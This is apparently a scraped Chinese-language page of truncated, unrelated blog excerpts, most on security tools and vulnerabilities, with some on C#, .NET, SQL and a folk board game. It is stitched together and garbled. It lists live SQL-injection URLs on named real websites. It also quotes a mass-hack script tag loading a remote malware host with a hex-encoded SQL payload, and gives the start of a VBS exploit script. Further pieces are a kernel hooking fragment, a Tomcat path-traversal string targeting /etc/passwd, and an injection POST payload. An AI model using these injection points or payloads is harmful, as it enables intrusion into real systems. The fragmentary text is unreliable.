其他

    Safe3通用遠程溢出漏洞掃描系統(Safe3 Remote Vul Scanner),簡稱Safe3RVS,是國內知名安全性群組織保護傘網路開發的一款輕量級漏洞掃描工具。         該工具具有掃描速度快(單漏洞每分鐘掃描一萬台伺服器)，自訂漏洞規則簡單，穩定性高等一系列突出功能。    漏洞規則檔案格式：掃描連接埠|發送資料|特徵資料|    發送資料和特徵資料為%+字元的16進位組成       

下面是一些注入點：希望不要利用這些漏洞幹壞事。sina  http://ig.games.sina.com.cn/iframe/iguess_api.php?api_id=4sina  http://mix.sina.com.cn/video/hot_video.php?t=%B2%C6%BE%AD搜狐 http://club.health.sohu.com/list_elite.php?b=paradise&ec=4001105貓撲

1、 運行環境        伺服器作業系統：Microsoft Windows Server 2003 Enterprise Edition Service Pack 1        伺服器IIS：6.0        用戶端：IE5.5+2、故障現象：        用戶端無法訪問Web伺服器，錯誤資訊是"頁面無法顯示"，伺服器上檢查IIS時未發現停止運行，但就是無法訪問（即使是靜態頁面）。查閱windows

轉自hyddd一.嗅探可以做什嗎？為什麼需要嗅探？　　嗅探(sniff)，就是竊聽網路上流經的資料包，而資料包裡面一般會包含很多重要的私隱資訊，如：你正在訪問什麼網站，你的郵箱密碼是多少，你在和哪個MM聊QQ等等......而很多攻擊方式（如著名的工作階段劫持）都是建立在嗅探的基礎上的。二.嗅探技術　　在集線器盛行的年代，要做嗅探是件相當簡單的事情，你什麼事情都不用幹，集線器自動會把別人的資料包往你機器上發。但是那個年代已經過去了，現在交換器已經代替集線器成為組建區域網路的重要裝置，而交換器不會

      駭客商業化掛馬越來越普遍，用GOOGLE搜尋下<script src=http://cn.daxia123.cn/cn.js></script>， 約有844,000個網站被掛馬。 最終經過安全傘終於抓到木馬原型如下：;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C40432056415243484152283235352920444

dnswalk, dnstracer,dnsenumDNSwalk是DNS debugger. 用於域的轉換和查詢資料庫命令列中的網域名稱必須以.結尾，你可有使用普通網域名稱例如：dnswalk example.com. 或者反網域名稱例如： dnswalk 3.2.1.in-addr.arpa命令舉例：#./dnswalk

作者：羅濤摘　要：通過對安全防護體系、安全性原則體系、安全管理體系三個方面，對電力資訊網路進行深入分析，從而形成相應的電力資訊網路安全解決方案資訊網路技術的高速發展和電力資訊系統的不斷投入，為電力企業帶來了成本降低、效率提高、業務開拓和形象提升等諸多好處，在感受網路所帶來優點的同時，企業也體驗到病毒、駭客等網路負面因素帶來的困擾。所以，建立完備的電力安全防護體系，確保電力系統資訊網路得以正常運轉，以保護企業的資訊資源不受侵害。通過對安全防護體系、安全性原則體系、安全管理體系三個方面，對電力資訊網

Suricata是一個網路入侵檢測和防護引擎，由開放資訊安全基金會及其支援的廠商開發。該引擎是多線程的，內建支援IPV6。可載入現有的Snort規則和簽名，支援 Barnyard 和 Barnyard2 工具Suricata 1.0 改進內容：1. 增加對標籤關鍵字的支援；2. 支援 UDP 的 DCERPC；3. 重複的簽名檢測；4. 提升對 CUDA 的支援、URI檢測；5.

     最近在用C#做網路通訊方面的WinForm程式，是C/S架構的程式，用到了多執行緒兩端的通訊。今天在調試的時候碰到了一個異常：Cross-thread operation not valid: Control 'btnConnect' accessed from a thread other than the thread it was created on.線上程上出問題了，但是在不調試的時候使用是正常的。於是去網上搜尋，又查了MSDN，原來是跨線程的問題。編譯器只允許建立win

本打算考慮寫個python版的，考慮大家的機器環境還是弄了個vbs版也利於修改以下是search.inc.php 檔案漏洞利用代碼VBS版 Dim strUrl,strSite,strPath,strUidshowB()Set Args = Wscript.ArgumentsIf Args.Count <> 3 ThenShowU()ElsestrSite=Args(0)strPath=Args(1)strUid=Args(2)End IfstrUrl="action=search&

反射技術反射（Reflection）是.NET中的重要機制，通過放射，可以在運行時獲得.NET中每一個類型（包括類、結構、委託、介面和枚舉等）的成員，包括方法、屬性、事件，以及建構函式等。還可以獲得每個成員的名稱、限定符和參數等。有了反射，即可對每一個類型了如指掌。如果獲得了建構函式的資訊，即可直接建立對象，即使這個對象的類型在編譯時間還不知道。 　　1、.NET可執行應用程式結構 　　程式碼在編譯後產生可執行檔應用，我們首先要瞭解這種可執行應用程式的結構。 　　應用程式結構分為應用程式定義域—

#include <ntddk.h> #include <ntifs.h>#include <windef.h>ULONG g_KiInsertQueueApc;ULONG g_uCr0;BYTE g_HookCode[5] = { 0xe9, 0, 0, 0, 0 };BYTE g_OrigCode[5] = { 0 }; // 原函數的前位元組內容BYTE jmp_orig_code[7] = { 0xEA, 0, 0, 0, 0, 0x08, 0x00 

  主要功能是通過底層核心驅動過濾技術對Web網站目錄提供全方位的防護，防止入侵者或病毒等對目錄中的網頁、電子文檔、圖片、資料庫等任何類型的檔案進行非法篡改和破壞。   1.網頁防掛馬   2.防止上傳webshell

呵呵，Apache Tomcat出了一個類似當年IIS url 編碼的漏洞。既然CVE已經已經公布了，我也來發一下吧！漏洞發生在Apache Tomcat處理UTF-8編碼時，沒有正確轉換，從而導致在處理包含%c0%ae%c0%ae的url時轉換為類似../的形式，使得可以遍曆系統任意檔案，包括/etc/passwd等觸發的條件為Apache Tomcat的設定檔context.xml 或 server.xml 的'allowLinking' 和 'URIencoding'

技術優勢：SQL注入網頁抓取網頁抓模數塊採用廣度優先爬蟲技術以及網站目錄還原技術。廣度優先的爬蟲技術的不會產生爬蟲陷入的問題，可自訂爬行深度和爬行線程，網站目錄還原技術則去除了無關結果，提高抓取效率。並且去掉了參數重複的注入頁面，使得效率和可觀性有了很大提高。SQL注入狀態掃描技術不同於傳統的針對錯誤反饋判斷是否存在注入漏洞的方式，而採用狀態檢測來判斷。所謂狀態檢測，即：針對某一連結輸入不同的參數，通過對網站反饋的結果使用向量比較演算法進行比對判斷，從而確定該連結是否為注入點，此方法不依賴於特定

漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html 利用方式:一個典型的sql注射漏洞,按照公告裡說的用 password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&am漏洞分析:

 Two weeks ago we have started new version of one of our primary web projects and have started very massive advertisement campaign to promote this web site. As the result of that advertisements, our outgoing traffic has been increased to 200-250Mbit/

1、varchar 類型的直接replace一下就ok了。如："update [t_information] set publisher=replace(publisher, '', '')"2、text欄位，就要麻煩一下（超過8000就要另想辦法了）"update [t_information] set AuthorInfor=replace(cast(AuthorInfor as varchar(8000)) ,'','')"3、有時有特殊符號，如 %，可以用下列的方法處理一下update

棋子遊戲類狼吃羊(相傳起源於北魏)遊戲人數:2人PK遊戲道具,石子,橡皮,粉筆頭等塊狀物質均可遊戲規則:先在地上划出一個5X5的方格,擺放位置如下,狼先走,之後雙方輪流走子,每次走一格,狼隔空位便可吃掉一隻羊(比方說,開局三隻狼對面的羊都可以吃掉,吃相鄰卻不能吃,也就是說當羊和狼在相鄰的兩個點上時,狼不能走也不能吃),當羊被吃完判羊輸,狼被困死則判狼輸.遊戲哲理是羊必須勇敢並團結一致，而且必須設法繞過狼的攻擊才可以戰勝死敵。當羊和狼相鄰的時候狼吃不了羊，因為這隻羊很勇敢當羊猶豫的時候，也就是離狼

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc),